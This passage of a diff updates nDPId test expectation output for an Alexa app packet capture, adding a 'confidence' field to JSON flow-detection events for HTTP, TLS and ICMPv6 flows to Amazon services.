-00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}}
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976080485,"flow_last_seen":1490976080485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976080485,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1490976080485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976080485,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80qBAAEAGOXysECrYIsc08JYEAbs8Ao8fAAAAAKAC\/\/9XyQAAAgQFtAQCCAoA9l2\/AAAAAAEDAwg="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1490976080542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976080542,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7lgTyw5w6PAKPIKASaN+a6gAAAgQFtAQCCApEF4DYAPZdvwEDAwg="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1490976080543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976080543,"pkt":"AMDKkaPvePiC0\/vCCABFAAA00qFAAEAGOYOsECrYIsc08JYEAbs8Ao8g8sOcO4AQAVcxOQAAAQEICgD2XcZEF4DY"}
-00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}}
+00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01321{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082723,"flow_last_seen":1490976082723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976082723,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1490976082723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976082723,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8n\/hAAEAGdDKsECrYNu8YuoUFAbsbksFnAAAAAKAC\/\/9eHgAAAgQFtAQCCAoA9l6fAAAAAAEDAwg="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082964,"flow_last_seen":1490976082964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976082964,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1490976082964,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976082964,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NvRAAEAG3TasECrYNu8YuoUGAbttlGhMAAAAAKAC\/\/9lHQAAAgQFtAQCCAoA9l64AAAAAAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1490976082969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976082969,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwftZAAOcG7l827xi6rBAq2AG7hQU1exHsG5LBaHASH\/6SVwAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1490976082973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976082973,"pkt":"AMDKkaPvePiC0\/vCCABFAAAon\/lAAEAGdEWsECrYNu8YuoUFAbsbksFoNXsR7VAQAVfcyAAA"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1490976083245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976083245,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWypAAOcGEgw27xi6rBAq2AG7hQaUlSPBbZRoTXASH\/4ogAAAAgQFtAEDAwY="}
-00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1490976083337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976083337,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNvVAAEAG3UmsECrYNu8YuoUGAbttlGhNlJUjwlAQAVdy8QAA"}
-00618{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1189,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1490976084800,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00609{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1189,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976084800,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00631{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1189,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1490976084800,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1189,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1490976084800,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00635{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1189,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976084800,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1189,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1490976084800,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085644,"flow_last_seen":1490976085644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976085644,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1490976085644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976085644,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8I8hAAEAGIyesECrYNF7ohrKHAbtpd3wLAAAAAKAC\/\/9ZswAAAgQFtAQCCAoA9l\/DAAAAAAEDAwg="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085829,"flow_last_seen":1490976085829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976085829,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -459,18 +459,18 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHsZAAOcGgTQ0XuiGrBAq2AG7sofzK0GgaXd8DHASH\/6hqwAAAgQFtAEDAwY="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwdw1AAOcGKO00XuiGrBAq2AG7sojjQR2VxkD2SnASH\/7+lwAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1490976085977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976085977,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoI8lAAEAGIzqsECrYNF7ohrKHAbtpd3wM8ytBoVAQAVfsHAAA"}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
